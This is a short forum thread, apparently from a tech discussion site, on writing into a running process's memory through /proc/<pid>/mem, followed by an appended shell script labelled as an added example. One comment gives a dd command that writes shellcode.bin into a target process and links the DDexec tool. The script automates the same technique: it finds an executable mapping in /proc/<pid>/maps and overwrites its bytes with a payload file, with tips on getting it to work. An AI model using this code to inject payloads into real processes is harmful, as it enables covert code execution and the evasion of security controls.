If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)
reply
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
reply
:(

Sounds super 1337 and I hope it's actually possible somehow.

reply
Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack. And then it's a matter of:

    $ dd if=shellcode.bin of=/proc/<pid>/mem bs=1 seek=$((target_addr)) ...
See also: DDExec

https://github.com/arget13/DDexec

reply
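The procedure in the comment above (parse /proc/<pid>/maps, pick an address, then write with dd into /proc/<pid>/mem), as an added example that is not from the thread or from the DDexec project. The maps text embedded below is constructed for illustration, the 0x1234 offset into the text segment is a hypothetical placeholder, and the patch function only works when the caller has ptrace access to the target (same uid, and under Yama ptrace_scope=1 the target must be a descendant, or CAP_SYS_PTRACE). Because bs=1 is used, seek= is a byte offset, and conv=notrunc keeps dd from attempting to truncate the mem file before writing.

```shell
#!/bin/sh
# Added example, not code from the thread or from DDexec.
# Locates a mapping in /proc/<pid>/maps, derives a target address, and
# overwrites bytes at that address through /proc/<pid>/mem with dd.

# Constructed sample of /proc/<pid>/maps output (not captured from a real run).
SAMPLE_MAPS='55d6c1e00000-55d6c1e01000 r--p 00000000 08:01 1234 /usr/bin/sleep
55d6c1e01000-55d6c1e05000 r-xp 00001000 08:01 1234 /usr/bin/sleep
55d6c1e05000-55d6c1e06000 r--p 00005000 08:01 1234 /usr/bin/sleep
55d6c1e06000-55d6c1e07000 rw-p 00006000 08:01 1234 /usr/bin/sleep
7f0c8a000000-7f0c8a022000 r--p 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f0c8a022000-7f0c8a1b7000 r-xp 00022000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd1c3e0000-7ffd1c401000 rw-p 00000000 00:00 0 [stack]'

# map_start MAPS PERMS PATTERN
# Prints the decimal start address of the first mapping whose permission
# field equals PERMS (e.g. r-xp) and whose path matches the awk regex PATTERN.
# Returns 1 when no mapping matches.
map_start() {
    hex=$(printf '%s\n' "$1" | awk -v perms="$2" -v pat="$3" '
        $2 == perms && $6 ~ pat { split($1, r, "-"); print r[1]; exit }')
    [ -n "$hex" ] || return 1
    echo "$((0x$hex))"
}

# target_addr MAPS PERMS PATTERN OFFSET
# Start of the matching mapping plus OFFSET bytes, in decimal, ready for seek=.
target_addr() {
    start=$(map_start "$1" "$2" "$3") || return 1
    echo "$((start + $4))"
}

# patch_memory PID ADDR FILE
# Writes the bytes of FILE into PID's address space at ADDR (decimal).
# bs=1 makes seek= a byte offset; conv=notrunc prevents dd from truncating
# /proc/PID/mem. Writes to r-xp pages succeed because the kernel treats
# /proc/<pid>/mem access like ptrace (it forces the write through copy-on-write).
# Requires ptrace access to PID; otherwise the open() fails with EACCES/EPERM.
patch_memory() {
    dd if="$3" of="/proc/$1/mem" bs=1 seek="$2" conv=notrunc 2>/dev/null
}

# Usage: ./patch.sh <pid> <shellcode.bin>
# Reads the live maps of <pid> and patches a hypothetical offset (0x1234) into
# the first r-xp mapping of /usr/bin/sleep. Only runs when both arguments are given.
if [ "$#" -ge 2 ]; then
    pid=$1
    payload=$2
    live_maps=$(cat "/proc/$pid/maps") || exit 1
    addr=$(target_addr "$live_maps" r-xp '/usr/bin/sleep' "$((0x1234))") || {
        echo "no r-xp mapping of /usr/bin/sleep in pid $pid" >&2
        exit 1
    }
    echo "writing $payload to pid $pid at $(printf '0x%x' "$addr")"
    patch_memory "$pid" "$addr" "$payload"
fi
```

To try it against a real target, start something you own as a descendant of the shell (for example `sleep 300 &`) and pass its pid and a payload file; with a stricter ptrace_scope (2 or 3) the open of /proc/<pid>/mem fails regardless of uid, which is the check to run first when the dd silently does nothing.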